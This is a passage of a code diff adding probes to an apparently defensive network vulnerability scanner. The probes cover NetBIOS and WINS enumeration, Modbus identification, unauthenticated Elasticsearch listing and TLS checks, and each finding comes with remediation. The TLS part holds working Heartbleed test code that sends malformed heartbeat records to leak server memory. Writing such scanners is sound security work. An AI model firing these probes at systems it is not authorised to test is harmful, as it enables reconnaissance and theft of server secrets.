+ """ + findings = [] + raw = {"banner": None, "netbios_names": [], "wins_responded": False} + + # -- Build NetBIOS wildcard node-status query (RFC 1002) -- + tid = struct.pack('>H', random.randint(0, 0xFFFF)) + # Flags: 0x0010 (recursion desired) + # Questions: 1, Answers/Auth/Additional: 0 + header = tid + struct.pack('>HHHHH', 0x0010, 1, 0, 0, 0) + # Encoded wildcard name "*" (first-level NetBIOS encoding) + # '*' (0x2A) → half-bytes 0x02, 0x0A → chars 'C','K', padded with 'A' (0x00 half-bytes) + qname = b'\x20' + b'CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + b'\x00' + # Type: NBSTAT (0x0021), Class: IN (0x0001) + question = struct.pack('>HH', 0x0021, 0x0001) + nbns_query = header + qname + question + + def _parse_nbns_response(data): + """Parse a NetBIOS node-status response and return list of (name, suffix, flags).""" + names = [] + if len(data) < 14: + return names + # Verify transaction ID matches + if data[:2] != tid: + return names + ancount = struct.unpack('>H', data[6:8])[0] + if ancount == 0: + return names + # Skip past header (12 bytes) then answer name (compressed pointer or full) + idx = 12 + if idx < len(data) and data[idx] & 0xC0 == 0xC0: + idx += 2 + else: + while idx < len(data) and data[idx] != 0: + idx += data[idx] + 1 + idx += 1 + # Type (2) + Class (2) + TTL (4) + RDLength (2) = 10 bytes + if idx + 10 > len(data): + return names + idx += 10 + if idx >= len(data): + return names + num_names = data[idx] + idx += 1 + # Each name entry: 15 bytes name + 1 byte suffix + 2 bytes flags = 18 bytes + for _ in range(num_names): + if idx + 18 > len(data): + break + name_bytes = data[idx:idx + 15] + suffix = data[idx + 15] + flags = struct.unpack('>H', data[idx + 16:idx + 18])[0] + name = name_bytes.decode('ascii', errors='ignore').rstrip() + names.append((name, suffix, flags)) + idx += 18 + return names + + def _udp_nbns_probe(udp_port): + """Send UDP NBNS wildcard query, return parsed names or empty list.""" + sock = None + try: + sock = 
socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + sock.settimeout(3) + sock.sendto(nbns_query, (target, udp_port)) + data, _ = sock.recvfrom(1024) + return _parse_nbns_response(data) + except Exception: + return [] + finally: + if sock is not None: + sock.close() + + def _add_nbns_findings(names, probe_label): + """Populate raw data and findings from enumerated NetBIOS names.""" + raw["netbios_names"] = [ + {"name": n, "suffix": f"0x{s:02X}", "type": self._NBNS_SUFFIX_TYPES.get(s, f"Unknown(0x{s:02X})")} + for n, s, _f in names + ] + name_list = "; ".join( + f"{n} <{s:02X}> ({self._NBNS_SUFFIX_TYPES.get(s, 'unknown')})" + for n, s, _f in names + ) + findings.append(Finding( + severity=Severity.HIGH, + title="NetBIOS name enumeration successful", + description=( + f"{probe_label} responded to a wildcard node-status query, " + "leaking computer name, domain membership, and potentially logged-in users." + ), + evidence=f"Names: {name_list[:200]}", + remediation="Block UDP port 137 at the firewall; disable NetBIOS over TCP/IP in network adapter settings.", + owasp_id="A01:2021", + cwe_id="CWE-200", + confidence="certain", + )) + findings.append(Finding( + severity=Severity.INFO, + title=f"NetBIOS names discovered ({len(names)} entries)", + description=f"Enumerated names: {name_list}", + evidence=f"Names: {name_list[:300]}", + confidence="certain", + )) + + try: + if port == 137: + # -- Direct UDP NBNS probe -- + names = _udp_nbns_probe(137) + if names: + raw["banner"] = f"NBNS: {len(names)} name(s) enumerated" + _add_nbns_findings(names, f"NBNS on {target}:{port}") + else: + raw["banner"] = "NBNS port open (no response to wildcard query)" + findings.append(Finding( + severity=Severity.INFO, + title="NBNS port open but no names returned", + description=f"UDP port {port} on {target} did not respond to NetBIOS wildcard query.", + confidence="tentative", + )) + else: + # -- TCP WINS replication probe (MS-WINSRA Association Start Request) -- + # Also attempt UDP NBNS 
side-probe to port 137 for name enumeration + names = _udp_nbns_probe(137) + if names: + _add_nbns_findings(names, f"NBNS side-probe to {target}:137") + + # Build MS-WINSRA Association Start Request per [MS-WINSRA] §2.2.3: + # Common Header (16 bytes): + # Packet Length: 41 (0x00000029) — excludes this field + # Reserved: 0x00007800 (opcode, ignored by spec) + # Destination Assoc Handle: 0x00000000 (first message, unknown) + # Message Type: 0x00000000 (Association Start Request) + # Body (25 bytes): + # Sender Assoc Handle: random 4 bytes + # NBNS Major Version: 2 (required) + # NBNS Minor Version: 5 (Win2k+) + # Reserved: 21 zero bytes (pad to 41) + sender_ctx = random.randint(1, 0xFFFFFFFF) + wrepl_header = struct.pack('>I', 41) # Packet Length + wrepl_header += struct.pack('>I', 0x00007800) # Reserved / opcode + wrepl_header += struct.pack('>I', 0) # Destination Assoc Handle + wrepl_header += struct.pack('>I', 0) # Message Type: Start Request + wrepl_body = struct.pack('>I', sender_ctx) # Sender Assoc Handle + wrepl_body += struct.pack('>HH', 2, 5) # Major=2, Minor=5 + wrepl_body += b'\x00' * 21 # Reserved padding + wrepl_packet = wrepl_header + wrepl_body + + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + sock.sendall(wrepl_packet) + + # Distinguish three recv outcomes: + # data received → parse as WREPL (confirmed WINS) + # timeout → connection held open, no reply (likely WINS, non-partner) + # empty / closed → server sent FIN immediately (unconfirmed service) + data = None + recv_timed_out = False + try: + data = sock.recv(1024) + except socket.timeout: + recv_timed_out = True + finally: + sock.close() + + if data and len(data) >= 20: + raw["wins_responded"] = True + # Parse response: first 4 bytes = Packet Length, next 16 = common header + resp_msg_type = struct.unpack('>I', data[12:16])[0] if len(data) >= 16 else None + version_info = "" + if resp_msg_type == 1 and len(data) >= 24: + # 
Association Start Response — extract version + resp_major = struct.unpack('>H', data[20:22])[0] if len(data) >= 22 else None + resp_minor = struct.unpack('>H', data[22:24])[0] if len(data) >= 24 else None + if resp_major is not None: + version_info = f" (NBNS version {resp_major}.{resp_minor})" + raw["nbns_version"] = {"major": resp_major, "minor": resp_minor} + raw["banner"] = f"WINS replication service{version_info}" + findings.append(Finding( + severity=Severity.MEDIUM, + title="WINS replication service exposed", + description=( + f"WINS on {target}:{port} responded to a WREPL Association Start Request{version_info}. " + "WINS is a legacy name-resolution service vulnerable to spoofing, enumeration, and " + "multiple remote code execution flaws (CVE-2004-1080, CVE-2009-1923, CVE-2009-1924). " + "It should not be accessible from untrusted networks." + ), + evidence=f"WREPL response ({len(data)} bytes): {data[:24].hex()}", + remediation=( + "Decommission WINS or restrict TCP port 42 to trusted replication partners. " + "If WINS is required, apply all patches (MS04-045, MS09-039) and set the registry key " + "RplOnlyWCnfPnrs=1 to accept replication only from configured partners." + ), + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="certain", + )) + elif data: + # Got some data but not enough for a valid WREPL response + raw["wins_responded"] = True + raw["banner"] = f"Port {port} responded ({len(data)} bytes, non-WREPL)" + findings.append(Finding( + severity=Severity.LOW, + title=f"Service on port {port} responded but is not standard WINS", + description=( + f"TCP port {port} on {target} returned data that does not match the " + "WINS replication protocol (MS-WINSRA). Another service may be listening." 
+ ), + evidence=f"Response ({len(data)} bytes): {data[:32].hex()}", + confidence="tentative", + )) + elif recv_timed_out: + # Connection accepted AND held open after our WREPL packet, but no + # reply — consistent with WINS silently dropping a non-partner request + # (RplOnlyWCnfPnrs=1). A non-WINS service would typically RST or FIN. + raw["banner"] = "WINS likely (connection held, no WREPL reply)" + findings.append(Finding( + severity=Severity.MEDIUM, + title="WINS replication port open (non-partner rejected)", + description=( + f"TCP port {port} on {target} accepted a WREPL Association Start Request " + "and held the connection open without responding, consistent with a WINS " + "server configured to reject non-partner replication (RplOnlyWCnfPnrs=1). " + "An exposed WINS port is a legacy attack surface subject to remote code " + "execution flaws (CVE-2004-1080, CVE-2009-1923, CVE-2009-1924)." + ), + evidence="TCP connection accepted and held open; WREPL handshake: no reply after 3 s", + remediation=( + "Block TCP port 42 at the firewall if WINS replication is not needed. " + "If required, restrict to trusted replication partners only." + ), + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="firm", + )) + else: + # recv returned empty — server immediately closed the connection. + # Cannot confirm WINS; don't produce a finding. The port scan + # already reports the open port; a "service unconfirmed" finding + # adds no actionable value to the report. + pass + except Exception as e: + return probe_error(target, port, "WINS/NBNS", e) + + if not findings: + # Could not confirm WINS — downgrade the protocol label so the UI + # does not display an unverified "WINS" tag from WELL_KNOWN_PORTS. 
+ port_protocols = self.state.get("port_protocols") + if port_protocols and port_protocols.get(port) in ("wins", "nbns"): + port_protocols[port] = "unknown" + return None + + return probe_result(raw_data=raw, findings=findings) + + def _service_info_modbus(self, target, port): # default port: 502 + """ + Send Modbus device identification request to detect exposed PLCs. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings = [] + raw = {"banner": None} + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + request = b'\x00\x01\x00\x00\x00\x06\x01\x2b\x0e\x01\x00' + sock.sendall(request) + data = sock.recv(256) + if data: + readable = ''.join(chr(b) if 32 <= b < 127 else '.' for b in data) + raw["banner"] = readable.strip()[:120] + findings.append(Finding( + severity=Severity.CRITICAL, + title="Modbus device responded to identification request", + description=f"Industrial control system on {target}:{port} is accessible without authentication. " + "Modbus has no built-in security — any network access means full device control.", + evidence=f"Device ID response: {readable.strip()[:80]}", + remediation="Isolate Modbus devices on a dedicated OT network; deploy a Modbus-aware firewall.", + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="certain", + )) + sock.close() + except Exception as e: + return probe_error(target, port, "Modbus", e) + return probe_result(raw_data=raw, findings=findings) + + + def _service_info_elasticsearch(self, target, port): # default port: 9200 + """ + Deep Elasticsearch probe: cluster info, index listing, node IPs, CVE matching. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. 
+ """ + findings, raw = [], {"cluster_name": None, "version": None} + base_url = f"http://{target}" if port == 80 else f"http://{target}:{port}" + + # First check if this is actually Elasticsearch (GET / must return JSON with cluster_name or tagline) + findings += self._es_check_root(base_url, raw) + if not raw["cluster_name"] and not raw.get("tagline"): + # Not Elasticsearch — skip further probing to avoid noise on regular HTTP ports + return None + + findings += self._es_check_indices(base_url, raw) + findings += self._es_check_nodes(base_url, raw) + + if raw["version"]: + findings += check_cves("elasticsearch", raw["version"]) + + if not findings: + findings.append(Finding(Severity.INFO, "Elasticsearch probe clean", "No issues detected.")) + + return probe_result(raw_data=raw, findings=findings) + + def _es_check_root(self, base_url, raw): + """GET / — extract version, cluster name.""" + findings = [] + try: + resp = requests.get(base_url, timeout=3) + if resp.ok: + try: + data = resp.json() + raw["cluster_name"] = data.get("cluster_name") + ver_info = data.get("version", {}) + raw["version"] = ver_info.get("number") if isinstance(ver_info, dict) else None + raw["tagline"] = data.get("tagline") + findings.append(Finding( + severity=Severity.HIGH, + title=f"Elasticsearch cluster metadata exposed", + description=f"Cluster '{raw['cluster_name']}' version {raw['version']} accessible without auth.", + evidence=f"cluster={raw['cluster_name']}, version={raw['version']}", + remediation="Enable X-Pack security or restrict network access.", + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="certain", + )) + except Exception: + if 'cluster_name' in resp.text: + findings.append(Finding( + severity=Severity.HIGH, + title="Elasticsearch cluster metadata exposed", + description=f"Cluster metadata accessible at {base_url}.", + evidence=resp.text[:200], + remediation="Enable authentication.", + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="firm", + )) + except 
Exception: + pass + return findings + + def _es_check_indices(self, base_url, raw): + """GET /_cat/indices — list accessible indices.""" + findings = [] + try: + resp = requests.get(f"{base_url}/_cat/indices?v", timeout=3) + if resp.ok and resp.text.strip(): + lines = resp.text.strip().split("\n") + index_count = max(0, len(lines) - 1) # subtract header + raw["index_count"] = index_count + if index_count > 0: + findings.append(Finding( + severity=Severity.HIGH, + title=f"Elasticsearch {index_count} indices accessible", + description=f"{index_count} indices listed without authentication.", + evidence="\n".join(lines[:6]), + remediation="Enable authentication and restrict index access.", + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="certain", + )) + except Exception: + pass + return findings + + def _es_check_nodes(self, base_url, raw): + """GET /_nodes — extract transport/publish addresses, classify IPs, check JVM.""" + findings = [] + try: + resp = requests.get(f"{base_url}/_nodes", timeout=3) + if resp.ok: + data = resp.json() + nodes = data.get("nodes", {}) + ips = set() + for node in nodes.values(): + for key in ("transport_address", "publish_address", "host"): + val = node.get(key) or "" + ip = val.rsplit(":", 1)[0] if ":" in val else val + if ip and ip not in ("127.0.0.1", "localhost", "0.0.0.0"): + ips.add(ip) + settings = node.get("settings", {}) + if isinstance(settings, dict): + net = settings.get("network", {}) + if isinstance(net, dict): + for k in ("host", "publish_host"): + v = net.get(k) + if v and v not in ("127.0.0.1", "localhost", "0.0.0.0"): + ips.add(v) + + if ips: + import ipaddress as _ipaddress + raw["node_ips"] = list(ips) + public_ips, private_ips = [], [] + for ip_str in ips: + try: + is_priv = _ipaddress.ip_address(ip_str).is_private + except (ValueError, TypeError): + is_priv = True # assume private on parse failure + if is_priv: + private_ips.append(ip_str) + else: + public_ips.append(ip_str) + 
self._emit_metadata("internal_ips", {"ip": ip_str, "source": "es_nodes"}) + + if public_ips: + findings.append(Finding( + severity=Severity.CRITICAL, + title=f"Elasticsearch leaks real public IP: {', '.join(sorted(public_ips)[:3])}", + description="The _nodes endpoint exposes public IP addresses, potentially revealing " + "the real infrastructure behind NAT/VPN/honeypot.", + evidence=f"Public IPs: {', '.join(sorted(public_ips))}", + remediation="Restrict /_nodes endpoint; configure network.publish_host to a safe value.", + owasp_id="A01:2021", + cwe_id="CWE-200", + confidence="certain", + )) + if private_ips: + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"Elasticsearch node internal IPs disclosed ({len(private_ips)})", + description=f"Node API exposes internal IPs: {', '.join(sorted(private_ips)[:5])}", + evidence=f"IPs: {', '.join(sorted(private_ips)[:10])}", + remediation="Restrict /_nodes endpoint access.", + owasp_id="A01:2021", + cwe_id="CWE-200", + confidence="certain", + )) + + # --- JVM version extraction --- + for node in nodes.values(): + jvm = node.get("jvm", {}) + if isinstance(jvm, dict): + jvm_version = jvm.get("version") + if jvm_version: + raw["jvm_version"] = jvm_version + try: + if jvm_version.startswith("1."): + # Java 1.x format: 1.7.0_55 → major=7, 1.8.0_345 → major=8 + major = int(jvm_version.split(".")[1]) + else: + # Modern format: 17.0.5 → major=17 + major = int(str(jvm_version).split(".")[0]) + if major <= 8: + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"Elasticsearch running on EOL JVM: Java {jvm_version}", + description=f"Java {jvm_version} is end-of-life and no longer receives security patches.", + evidence=f"jvm.version={jvm_version}", + remediation="Upgrade to a supported Java LTS release (17+).", + owasp_id="A06:2021", + cwe_id="CWE-1104", + confidence="certain", + )) + except (ValueError, IndexError): + pass + break # one node is enough + except Exception: + pass + return findings diff --git 
a/extensions/business/cybersec/red_mesh/worker/service/tls.py b/extensions/business/cybersec/red_mesh/worker/service/tls.py new file mode 100644 index 00000000..02dc2e20 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/worker/service/tls.py @@ -0,0 +1,744 @@ +import random +import re as _re +import socket +import struct +import ssl + +import requests + +from ...findings import Finding, Severity, probe_result, probe_error +from ...cve_db import check_cves +from ._base import _ServiceProbeBase + + +class _ServiceTlsMixin(_ServiceProbeBase): + """TLS inspection and generic service fingerprinting probes.""" + + def _service_info_tls(self, target, port): + """ + Inspect TLS handshake, certificate chain, and cipher strength. + + Uses a two-pass approach: unverified connect (always gets protocol/cipher), + then verified connect (detects self-signed / chain issues). + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings with protocol, cipher, cert details. 
+ """ + from datetime import datetime + + findings = [] + raw = {"protocol": None, "cipher": None, "cert_subject": None, "cert_issuer": None} + + # Pass 1: Unverified — always get protocol/cipher + proto, cipher, cert_der = self._tls_unverified_connect(target, port) + if proto is None: + return probe_error(target, port, "TLS", Exception("unverified connect failed")) + + raw["protocol"], raw["cipher"] = proto, cipher + findings += self._tls_check_protocol(proto, cipher) + + # Pass 1b: SAN parsing and signature check from DER cert + if cert_der: + san_dns, san_ips = self._tls_parse_san_from_der(cert_der) + raw["san_dns"] = san_dns + raw["san_ips"] = san_ips + for ip_str in san_ips: + try: + import ipaddress as _ipaddress + if _ipaddress.ip_address(ip_str).is_private: + self._emit_metadata("internal_ips", {"ip": ip_str, "source": f"tls_san:{port}"}) + except (ValueError, TypeError): + pass + findings += self._tls_check_signature_algorithm(cert_der) + findings += self._tls_check_validity_period(cert_der) + + # Pass 2: Verified — detect self-signed / chain issues + findings += self._tls_check_certificate(target, port, raw) + + # Pass 3: Cert content checks (expiry, default CN) + findings += self._tls_check_expiry(raw) + findings += self._tls_check_default_cn(raw) + + # Pass 4: Heartbleed (CVE-2014-0160) + heartbleed = self._tls_check_heartbleed(target, port) + if heartbleed: + findings.append(heartbleed) + + # Pass 5: Downgrade attacks (POODLE / BEAST) + findings += self._tls_check_downgrade(target, port) + + if not findings: + findings.append(Finding(Severity.INFO, f"TLS {proto} {cipher}", "TLS configuration adequate.")) + + return probe_result(raw_data=raw, findings=findings) + + def _tls_unverified_connect(self, target, port): + """Unverified TLS connect to get protocol, cipher, and DER cert.""" + try: + ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) + ctx.check_hostname = False + ctx.verify_mode = ssl.CERT_NONE + with socket.create_connection((target, port), 
timeout=3) as sock: + with ctx.wrap_socket(sock, server_hostname=target) as ssock: + proto = ssock.version() + cipher_info = ssock.cipher() + cipher_name = cipher_info[0] if cipher_info else "unknown" + cert_der = ssock.getpeercert(binary_form=True) + return proto, cipher_name, cert_der + except Exception as e: + self.P(f"TLS unverified connect failed on {target}:{port}: {e}", color='y') + return None, None, None + + def _tls_check_protocol(self, proto, cipher): + """Flag obsolete TLS/SSL protocols and weak ciphers.""" + findings = [] + if proto and proto.upper() in ("SSLV2", "SSLV3", "TLSV1", "TLSV1.1"): + findings.append(Finding( + severity=Severity.HIGH, + title=f"Obsolete TLS protocol: {proto}", + description=f"Server negotiated {proto} with cipher {cipher}. " + f"SSLv2/v3 and TLS 1.0/1.1 are deprecated and vulnerable.", + evidence=f"protocol={proto}, cipher={cipher}", + remediation="Disable SSLv2/v3/TLS 1.0/1.1 and require TLS 1.2+.", + owasp_id="A02:2021", + cwe_id="CWE-326", + confidence="certain", + )) + if cipher and any(w in cipher.lower() for w in ("rc4", "des", "null", "export")): + findings.append(Finding( + severity=Severity.HIGH, + title=f"Weak TLS cipher: {cipher}", + description=f"Cipher {cipher} is considered cryptographically weak.", + evidence=f"cipher={cipher}", + remediation="Disable weak ciphers (RC4, DES, NULL, EXPORT).", + owasp_id="A02:2021", + cwe_id="CWE-327", + confidence="certain", + )) + return findings + + def _tls_check_certificate(self, target, port, raw): + """Verified TLS pass — detect self-signed, untrusted issuer, hostname mismatch.""" + from datetime import datetime + + findings = [] + try: + ctx = ssl.create_default_context() + with socket.create_connection((target, port), timeout=3) as sock: + with ctx.wrap_socket(sock, server_hostname=target) as ssock: + cert = ssock.getpeercert() + subj = dict(x[0] for x in cert.get("subject", ())) + issuer = dict(x[0] for x in cert.get("issuer", ())) + raw["cert_subject"] = 
subj.get("commonName") + raw["cert_issuer"] = issuer.get("organizationName") or issuer.get("commonName") + raw["cert_not_after"] = cert.get("notAfter") + except ssl.SSLCertVerificationError as e: + err_msg = str(e).lower() + if "self-signed" in err_msg or "self signed" in err_msg: + findings.append(Finding( + severity=Severity.MEDIUM, + title="Self-signed TLS certificate", + description="The server presents a self-signed certificate that browsers will reject.", + evidence=str(e), + remediation="Replace with a certificate from a trusted CA.", + owasp_id="A02:2021", + cwe_id="CWE-295", + confidence="certain", + )) + elif "hostname mismatch" in err_msg: + findings.append(Finding( + severity=Severity.MEDIUM, + title="TLS certificate hostname mismatch", + description=f"Certificate CN/SAN does not match {target}.", + evidence=str(e), + remediation="Ensure the certificate covers the served hostname.", + owasp_id="A02:2021", + cwe_id="CWE-295", + confidence="certain", + )) + else: + findings.append(Finding( + severity=Severity.MEDIUM, + title="TLS certificate validation failed", + description="Certificate chain could not be verified.", + evidence=str(e), + remediation="Use a certificate from a trusted CA with a valid chain.", + owasp_id="A02:2021", + cwe_id="CWE-295", + confidence="firm", + )) + except Exception: + pass # Non-cert errors (connection reset, etc.) 
— skip + return findings + + def _tls_check_expiry(self, raw): + """Check certificate expiry from raw dict.""" + from datetime import datetime + + findings = [] + expires = raw.get("cert_not_after") + if not expires: + return findings + try: + exp = datetime.strptime(expires, "%b %d %H:%M:%S %Y %Z") + days = (exp - datetime.utcnow()).days + raw["cert_days_remaining"] = days + if days < 0: + findings.append(Finding( + severity=Severity.HIGH, + title=f"TLS certificate expired ({-days} days ago)", + description="The certificate has already expired.", + evidence=f"notAfter={expires}", + remediation="Renew the certificate immediately.", + owasp_id="A02:2021", + cwe_id="CWE-298", + confidence="certain", + )) + elif days <= 30: + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"TLS certificate expiring soon ({days} days)", + description=f"Certificate expires in {days} days.", + evidence=f"notAfter={expires}", + remediation="Renew the certificate before expiry.", + owasp_id="A02:2021", + cwe_id="CWE-298", + confidence="certain", + )) + except Exception: + pass + return findings + + def _tls_check_default_cn(self, raw): + """Flag placeholder common names.""" + findings = [] + cn = raw.get("cert_subject") + if not cn: + return findings + cn_lower = cn.lower() + placeholders = ("example.com", "localhost", "internet widgits", "test", "changeme", "my company", "acme", "default") + if any(p in cn_lower for p in placeholders) or len(cn.strip()) <= 1: + findings.append(Finding( + severity=Severity.LOW, + title=f"TLS certificate placeholder CN: {cn}", + description="Certificate uses a default/placeholder common name.", + evidence=f"CN={cn}", + remediation="Replace with a certificate bearing the correct hostname.", + owasp_id="A02:2021", + cwe_id="CWE-295", + confidence="firm", + )) + return findings + + def _tls_parse_san_from_der(self, cert_der): + """Parse SAN DNS names and IP addresses from a DER-encoded certificate.""" + dns_names, ip_addresses = [], [] + if not 
cert_der: + return dns_names, ip_addresses + try: + from cryptography import x509 + cert = x509.load_der_x509_certificate(cert_der) + try: + san_ext = cert.extensions.get_extension_for_class(x509.SubjectAlternativeName) + dns_names = san_ext.value.get_values_for_type(x509.DNSName) + ip_addresses = [str(ip) for ip in san_ext.value.get_values_for_type(x509.IPAddress)] + except x509.ExtensionNotFound: + pass + except Exception: + pass + return dns_names, ip_addresses + + def _tls_check_signature_algorithm(self, cert_der): + """Flag SHA-1 or MD5 signature algorithms.""" + findings = [] + if not cert_der: + return findings + try: + from cryptography import x509 + from cryptography.hazmat.primitives import hashes + cert = x509.load_der_x509_certificate(cert_der) + algo = cert.signature_hash_algorithm + if algo and isinstance(algo, (hashes.SHA1, hashes.MD5)): + algo_name = algo.name.upper() + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"TLS certificate signed with weak algorithm: {algo_name}", + description=f"The certificate uses {algo_name} for its signature, which is cryptographically weak.", + evidence=f"signature_algorithm={algo_name}", + remediation="Replace with a certificate using SHA-256 or stronger.", + owasp_id="A02:2021", + cwe_id="CWE-327", + confidence="certain", + )) + except Exception: + pass + return findings + + def _tls_check_validity_period(self, cert_der): + """Flag certificates with a total validity span >5 years (CA/Browser Forum violation).""" + findings = [] + if not cert_der: + return findings + try: + from cryptography import x509 + cert = x509.load_der_x509_certificate(cert_der) + span = cert.not_valid_after_utc - cert.not_valid_before_utc + if span.days > 5 * 365: + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"TLS certificate validity span exceeds 5 years ({span.days} days)", + description="Certificates valid for more than 5 years violate CA/Browser Forum baseline requirements.", + 
evidence=f"not_before={cert.not_valid_before_utc}, not_after={cert.not_valid_after_utc}, span={span.days}d", + remediation="Reissue with a validity period of 398 days or less.", + owasp_id="A02:2021", + cwe_id="CWE-298", + confidence="certain", + )) + except Exception: + pass + return findings + + + def _tls_check_heartbleed(self, target, port): + """Test for Heartbleed (CVE-2014-0160) by sending a malformed TLS heartbeat. + + Builds a raw TLS connection, completes handshake, then sends a heartbeat + request with payload_length > actual payload. If the server responds with + more data than sent, it is leaking memory. + + Returns + ------- + Finding or None + CRITICAL finding if vulnerable, None otherwise. + """ + try: + # Connect and perform TLS handshake via ssl module + ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) + ctx.check_hostname = False + ctx.verify_mode = ssl.CERT_NONE + # Allow older protocols for compatibility with vulnerable servers + ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED + + raw_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + raw_sock.settimeout(3) + raw_sock.connect((target, port)) + tls_sock = ctx.wrap_socket(raw_sock, server_hostname=target) + + # Get the negotiated TLS version for the heartbeat record + tls_version = tls_sock.version() + version_map = { + "TLSv1": b"\x03\x01", "TLSv1.1": b"\x03\x02", + "TLSv1.2": b"\x03\x03", "TLSv1.3": b"\x03\x03", + "SSLv3": b"\x03\x00", + } + tls_ver_bytes = version_map.get(tls_version, b"\x03\x01") + + # Build heartbeat request (ContentType=24, HeartbeatMessageType=1=request) + # payload_length is set to 16384 but actual payload is only 1 byte + # This is the essence of the Heartbleed attack: asking for more data than sent + hb_payload = b"\x01" # 1 byte actual payload + hb_msg = ( + b"\x01" # HeartbeatMessageType: request + + b"\x40\x00" # payload_length: 16384 (0x4000) + + hb_payload # actual payload: 1 byte + + b"\x00" * 16 # padding (16 bytes) + ) + + # TLS record: 
ContentType=24 (Heartbeat), version, length + tls_record = ( + b"\x18" # ContentType: Heartbeat + + tls_ver_bytes # TLS version + + struct.pack(">H", len(hb_msg)) + + hb_msg + ) + + # Send via the underlying raw socket (bypassing ssl module) + # We need to access the raw socket after handshake + # The ssl wrapper doesn't let us send raw records, so use raw_sock. + # After wrap_socket, raw_sock is consumed. Instead, use tls_sock.unwrap() + # to get the raw socket back. + try: + raw_after = tls_sock.unwrap() + raw_after.sendall(tls_record) + raw_after.settimeout(3) + response = raw_after.recv(65536) + raw_after.close() + except (ssl.SSLError, OSError): + # If unwrap fails, try closing and testing with a new raw connection + tls_sock.close() + return self._tls_heartbleed_raw(target, port, tls_ver_bytes) + + if response and len(response) >= 7: + # Check if response is a heartbeat response (ContentType=24) + if response[0] == 24: + resp_len = struct.unpack(">H", response[3:5])[0] + # If server sent back more than we sent (3 bytes of heartbeat msg), + # it leaked memory + if resp_len > len(hb_msg): + return Finding( + severity=Severity.CRITICAL, + title="TLS Heartbleed vulnerability (CVE-2014-0160)", + description=f"Server at {target}:{port} is vulnerable to Heartbleed. " + "An attacker can read up to 64KB of server memory per request, " + "potentially exposing private keys, session tokens, and passwords.", + evidence=f"Heartbeat response size ({resp_len} bytes) > request payload size ({len(hb_msg)} bytes). 
" + f"Leaked {resp_len - len(hb_msg)} bytes of server memory.", + remediation="Upgrade OpenSSL to 1.0.1g or later and regenerate all private keys and certificates.", + owasp_id="A06:2021", + cwe_id="CWE-126", + confidence="certain", + ) + # TLS Alert (ContentType=21) = not vulnerable (server rejected heartbeat) + elif response[0] == 21: + return None + + except Exception: + pass + return None + + def _tls_heartbleed_raw(self, target, port, tls_ver_bytes): + """Fallback Heartbleed test using a raw TLS ClientHello with heartbeat extension. + + This is needed when ssl.unwrap() fails. We build a minimal TLS 1.0 + ClientHello that advertises the heartbeat extension, complete the handshake, + and then send the malformed heartbeat. + + Returns + ------- + Finding or None + """ + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(5) + sock.connect((target, port)) + + # Minimal TLS 1.0 ClientHello with heartbeat extension + # This is a simplified approach: we use struct to build the exact bytes + hello = bytearray() + # Handshake header: ClientHello (0x01) + # Random: 32 bytes + client_random = random.randbytes(32) + # Session ID: 0 bytes + # Cipher suites: a few common ones + ciphers = ( + b"\x00\x2f" # TLS_RSA_WITH_AES_128_CBC_SHA + b"\x00\x35" # TLS_RSA_WITH_AES_256_CBC_SHA + b"\x00\x0a" # TLS_RSA_WITH_3DES_EDE_CBC_SHA + ) + # Compression: null only + compression = b"\x01\x00" + # Extensions: heartbeat (type 0x000f, length 1, mode=1 peer allowed to send) + heartbeat_ext = struct.pack(">HH", 0x000f, 1) + b"\x01" + extensions = heartbeat_ext + + client_hello_body = ( + b"\x03\x01" # TLS 1.0 + + client_random + + b"\x00" # Session ID length: 0 + + struct.pack(">H", len(ciphers)) + ciphers + + compression + + struct.pack(">H", len(extensions)) + extensions + ) + + # Handshake message: type=1 (ClientHello), length + handshake = b"\x01" + struct.pack(">I", len(client_hello_body))[1:] + client_hello_body + + # TLS record: ContentType=22 
(Handshake), version=TLS 1.0 + tls_record = b"\x16\x03\x01" + struct.pack(">H", len(handshake)) + handshake + sock.sendall(tls_record) + + # Read ServerHello + Certificate + ServerHelloDone + # We just need to consume enough to complete the handshake + server_response = b"" + for _ in range(10): + try: + chunk = sock.recv(16384) + if not chunk: + break + server_response += chunk + # Check if we received ServerHelloDone (handshake type 0x0e) + if b"\x0e\x00\x00\x00" in server_response: + break + except (socket.timeout, OSError): + break + + if not server_response: + sock.close() + return None + + # Now send the malformed heartbeat + hb_msg = b"\x01\x40\x00" + b"\x41" + b"\x00" * 16 # type=request, length=16384, 1 byte payload + padding + hb_record = b"\x18\x03\x01" + struct.pack(">H", len(hb_msg)) + hb_msg + sock.sendall(hb_record) + + # Read response + sock.settimeout(3) + try: + response = sock.recv(65536) + except (socket.timeout, OSError): + response = b"" + sock.close() + + if response and len(response) >= 7 and response[0] == 24: + resp_payload_len = struct.unpack(">H", response[3:5])[0] + if resp_payload_len > len(hb_msg): + return Finding( + severity=Severity.CRITICAL, + title="TLS Heartbleed vulnerability (CVE-2014-0160)", + description=f"Server at {target}:{port} is vulnerable to Heartbleed. " + "An attacker can read up to 64KB of server memory per request, " + "potentially exposing private keys, session 